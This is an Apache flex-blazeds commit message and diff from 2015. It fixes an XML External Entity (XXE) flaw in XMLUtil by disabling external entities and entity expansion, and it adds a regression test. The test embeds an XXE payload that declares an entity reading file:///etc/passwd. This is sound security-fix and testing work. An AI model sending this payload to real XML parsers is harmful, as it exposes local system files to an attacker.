Repository: flex-blazeds Updated Branches: refs/heads/develop aa98ccdf0 -> af405aa59
Fix security issue due to local entity resolution issues in DocumentBuilder. Project: http://git-wip-us.apache.org/repos/asf/flex-blazeds/repo Commit: http://git-wip-us.apache.org/repos/asf/flex-blazeds/commit/af405aa5 Tree: http://git-wip-us.apache.org/repos/asf/flex-blazeds/tree/af405aa5 Diff: http://git-wip-us.apache.org/repos/asf/flex-blazeds/diff/af405aa5 Branch: refs/heads/develop Commit: af405aa5974f8441873873ac6400dddc1039778e Parents: aa98ccd Author: Christofer Dutz <[email protected]> Authored: Thu Jul 23 14:18:34 2015 +0200 Committer: Christofer Dutz <[email protected]> Committed: Thu Jul 23 14:18:34 2015 +0200 ---------------------------------------------------------------------- .../core/src/flex/messaging/util/XMLUtil.java | 8 +++++ .../BlazeDsXmlProcessingXXEVulnerability.java | 36 ++++++++++++++++++++ 2 files changed, 44 insertions(+) ---------------------------------------------------------------------- http://git-wip-us.apache.org/repos/asf/flex-blazeds/blob/af405aa5/modules/core/src/flex/messaging/util/XMLUtil.java ---------------------------------------------------------------------- diff --git a/modules/core/src/flex/messaging/util/XMLUtil.java b/modules/core/src/flex/messaging/util/XMLUtil.java index d34c344..da3349e 100644 --- a/modules/core/src/flex/messaging/util/XMLUtil.java +++ b/modules/core/src/flex/messaging/util/XMLUtil.java @@ -123,6 +123,14 @@ public class XMLUtil StringReader reader = new StringReader(xml); InputSource input = new InputSource(reader); DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); + + // Disable local resolution of entities due to security issues + // See: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing + factory.setFeature("http://xml.org/sax/features/external-general-entities";, false); + factory.setFeature("http://xml.org/sax/features/external-parameter-entities";, false); + factory.setXIncludeAware(false); + factory.setExpandEntityReferences(false); + factory.setNamespaceAware(nameSpaceAware); factory.setValidating(false); DocumentBuilder builder = factory.newDocumentBuilder(); http://git-wip-us.apache.org/repos/asf/flex-blazeds/blob/af405aa5/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java ---------------------------------------------------------------------- diff --git a/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java b/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java new file mode 100644 index 0000000..71519dc --- /dev/null +++ b/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java @@ -0,0 +1,36 @@ +package flex.messaging.securityadvisories; + +import com.sun.org.apache.xml.internal.serialize.OutputFormat; +import com.sun.org.apache.xml.internal.serialize.XMLSerializer; +import flex.messaging.util.XMLUtil; +import junit.framework.Assert; +import junit.framework.TestCase; +import org.w3c.dom.Document; + +import java.io.StringWriter; + +/** + * Created by christoferdutz on 23.07.15. + */ + +public class BlazeDsXmlProcessingXXEVulnerability extends TestCase { + + public void testVulnerability() throws Exception { + StringBuffer xml = new StringBuffer(512); + xml.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"); + xml.append("<!DOCTYPE foo [\r\n"); + xml.append("<!ELEMENT foo ANY >\r\n"); + xml.append("<!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>\r\n"); + xml.append("<foo>&xxe;</foo>"); + + Document data = XMLUtil.stringToDocument(xml.toString()); + + OutputFormat format = new OutputFormat(data); + StringWriter stringOut = new StringWriter(); + XMLSerializer serial = new XMLSerializer(stringOut, format); + serial.serialize(data); + + Assert.assertTrue(stringOut.toString().contains("&xxe;")); + } + +}
